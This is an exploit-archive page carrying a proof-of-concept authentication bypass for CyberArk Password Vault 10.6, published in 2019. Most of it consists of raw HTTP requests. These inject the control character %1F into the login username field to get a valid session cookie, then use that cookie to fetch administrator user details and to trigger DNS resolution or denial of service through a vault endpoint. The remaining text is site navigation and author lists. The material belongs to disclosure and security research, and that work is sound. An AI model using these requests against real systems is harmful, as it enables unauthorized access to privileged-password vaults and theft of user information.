CyberArk Password Vault 10.6 Authentication Bypass

CyberArk Password Vault 10.6 Authentication Bypass: Posted Oct 16, 2019; Authored by Luis Buendia, Daniel Martinez Adan; CyberArk Password Vault version 10.6 suffers from an authentication bypass vulnerability.; tags | exploit, bypass; SHA-256 | 0e9b1adc722b6332170f51ef16463135606931c78eda0ead1adb22a59b07b4e3; Download | Favorite | View

CyberArk Password Vault 10.6 Authentication Bypass

# Exploit Title: CyberArk Password Vault 10.6 - Authentication Bypass
# Date: 2019-10-16
# Author: Daniel Martinez Adan (adon90)
# Vendor: https://www.cyberark.com
# Software: https://www.cyberark.com/products/privileged-account-security-solution/enterprise-password-vault/
# Collaborator: Luis Buendía (exoticpayloads)
# Version Affected: All
     
# It is possible to retrieve a valid cookie by injecting special characters
# in the username field:

vulnerable parameter:
pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtUsername

URL:
/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx

Payload:
%1F

# Requirements:
# Using a valid ViewState -> if it doesn't work, go to the login panel to
# automatically generate a valid ViewState


# Once the valid cookie is obtained, it is posible to perform multiple
# actions in the PasswordVault such us:
# - Retrieving valid user information (Name, Email, Phone number….)
# - DoS
# - DNS enumeration via ip address
# - Possibly deleting users


# Login Bypass:

POST /PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx
Content-Type: application/x-www-form-urlencoded
Content-Length: 2435
Connection: close
Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca
Upgrade-Insecure-Requests: 1
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=gjUPDVmn3eCu84zX77GBo4yZO5ypQSyENJ%2FiPcWTNRTh9MtlLoZ6wvk6nCnoK8MeZfh%2BUA9fqjr80wBpvTA04Xkq8mnhgITyUkAx8PuG09vlGK7CBUxV4PHxPooSWtC%2F2RccxoRIuCucsVDXD27UTCiS4VmDoUWDORoecURYhzV2PH7pXm4XGNtNxeI%2FuLXPvwVYAOYkyUZZloZALalGC54rL24Iery7YR0uYvaC61OmxhCtYVy8zHlu7p2fK%2FUHxGxw3oMKrVJA%2BTCT1%2B5AoO4apN7uA%2BBmJzFhcl9vPrdlgCdu%2F1Ei%2F1O0oVn6BOd%2BhFDHdDbpKAX6xIJAWRfb9%2BGG8qobGKR%2B8Fvhao9hx3oCieBe7BvJL%2Fe9Y61tLtvnoLBHwc7uvG4V1lg5oNcQQeEZTGosZ3xrt3dR3kZe2b6vY0QG8YVlJCv56Xb1Ylr7mI7FIbUbKxbZvIkIPrPlKTvkzUTYGXsBOVXNy9KyAhI2%2B9DVkTFFhp%2FK4uWMCMxVq%2FgRxiEyukUbWvobQxSnUH4aNntJiD0Nmlc6UzwNxfvo%2FUNJx8i0yoPoi4PMomsQTE6%2FjtAQiO9rrf6syMLp2lLqXzQ7u90BqyUB9%2BOkn2C2AKZcir2KyT4vGcVOgEfUiZ7twd%2B4uq4acPpQBNto3zBCtgtKzW5iv8TfSCRuigtaT7Oz5qZvWq7UX%2Bqye9cugocb%2BUbaWVXJqcy0Gkdm0BPrRpiCbkSYqfx%2Fo7fYuDjEnMhXrOwBCUOfHhAcjXHZeeJY%2FKsnRP0Aa2%2BNzCOPimbvVEIq0CzTonYV6WFh1a0aDc0m8Qgchz9RnYR67efSftSQYpPzsBIdp0MsFuZ5AmSPROHH37N0zWVV%2BlVvPfwuSlLFV8d5Kq41KJtucYwenrZMq7lhKcDvaRZz5LOFR71DdrYwZoPloK4BK3yl8w8GaOnyRSQsQ0yW4xj5RbJLKN5J54I2fXDkgIVMJY6dbsztZ2JO%2BTpa5xPjJCIjXTR%2B4pJTqCBWc%2FLJ0xzz6x2EOOP9eMY8RH3GaEdg8Lww66zOzpIyXiOBT0VqyRTDxVd2UnEwJZDqwmcHh1n1nN%2BAQoWk2aJDBev9WiGLSx2GxtipLElZsWTcG5txklqFKB7b5mG2jIsx4%2B%2BRlAz2q6b8YJxKem1FnJwQhTyWZ5%2BgEnEGYIylH%2FsYP2eOcBJr5J7gamu%2FsqF9fZa4AJHxEx%2BspDmzm607z8H2AqOhWRemllMT87KVlCuTKiWw3gj7bhj19KtaE1AwmHid5ISXbt%2F5Gcw4LDvDkmfR1akym0jPGdECSyJG0qbhKiE3abdXESlMCURfX6g1W%2B9i8WZJ4hDtHcsPudD6yhp32NSDa2eVqw%3D%3D&__VIEWSTATEGENERATOR=4EAA75BD&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=yRuqYr%2BEabjm0oMhAb6WmehsX2QOYJhKOP0z9IJq8R2B9Md%2Fi17pZwRXSuLkNN72eNRdEnD%2Fcjr3L3KJLehz7ol6U%2BUONvRqU3dO66PrJIvFj%2BDji4%2FvZeOpLeaI0nY9mSU7%2FdBiOgLzdPnDtNu9G%2BwlR4Z8FdWPayd8UDMqShb%2FmObsqqsoxooNVf8jUFa1X98oKyPHztYNS6ip8fIBl4ksqvsPQhZnc%2Fj%2FniKwWp2GZ%2FmnEhIYMxVVx5tirrB16M4dJqa5ROmxuL%2FJcnW0hqFlAkAycTdep5r0nvN1kXXrIco4RhE52ZbP9yKpr5%2FOyVASLr42dCgOSKXcgkFL1A%3D%3D&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtUsername=%1F&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtPassword=&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AbtnLogon=Sign+in&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ANewPassword2Hidden=&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3APasswordHidden=admin&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ANewPassword1Hidden=&AuthModuleUsed=radius&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ASkipChangePwd=


# User Information:

POST /PasswordVault/services/PrivilegedAccountAccess.asmx/GetUserDetails HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx
Connection: close
Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca;6a5a355a-0547-40ce-9770-fc22d1f3bbea=F538D6D97C6816BC6B22F3685B502B7F0ADA08D2D672995205A3C9E00DAA41E2B679ABAEF1FFD6E6F6DB48F3BA71DA768CA995110FA093634502838D8B4C9533851442A9EE06A041FB7631E2630CDE9F79590C6FDF4E67702F70144FBBD75C75D03B5F70A50EA7F31DFFAB6A81923EF27423A9A419A72E956A76C70E5667A2B1617201BD9168B6CD125EADA08D5B81F77C3224287849EFF258172CC2D51CDF1A9C064BB9F7E4C2450ACE8954B74DE109
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 28
{"userName":"administrator"}


# Resolve DNS / DoS

GET /PasswordVault/ResolveMachineAddress.aspx?data=&moreinfo=127.0.0.1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
CAAjax: adon90
Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx
Connection: close
Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca;6a5a355a-0547-40ce-9770-fc22d1f3bbea=F538D6D97C6816BC6B22F3685B502B7F0ADA08D2D672995205A3C9E00DAA41E2B679ABAEF1FFD6E6F6DB48F3BA71DA768CA995110FA093634502838D8B4C9533851442A9EE06A041FB7631E2630CDE9F79590C6FDF4E67702F70144FBBD75C75D03B5F70A50EA7F31DFFAB6A81923EF27423A9A419A72E956A76C70E5667A2B1617201BD9168B6CD125EADA08D5B81F77C3224287849EFF258172CC2D51CDF1A9C064BB9F7E4C2450ACE8954B74DE109
Upgrade-Insecure-Requests: 1

Top Authors In Last 30 Days

Red Hat 234 files
indoushka 93 files
Ubuntu 87 files
Gentoo 36 files
Jasper Nota 25 files
Debian 21 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Apple 9 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,099)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,756)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,521)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,747)
UNIX (9,436)
UnixWare (187)
Windows (6,674)
Other

CyberArk Password Vault 10.6 Authentication Bypass

CyberArk Password Vault 10.6 Authentication Bypass

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

CyberArk Password Vault 10.6 Authentication Bypass

Share This

CyberArk Password Vault 10.6 Authentication Bypass

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems